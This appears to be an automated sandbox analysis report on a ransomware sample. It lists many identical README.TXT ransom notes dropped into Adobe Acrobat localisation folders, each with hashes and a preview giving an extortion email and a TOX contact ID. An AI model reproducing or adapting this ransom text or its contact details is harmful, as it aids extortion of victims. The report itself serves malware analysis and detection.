                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
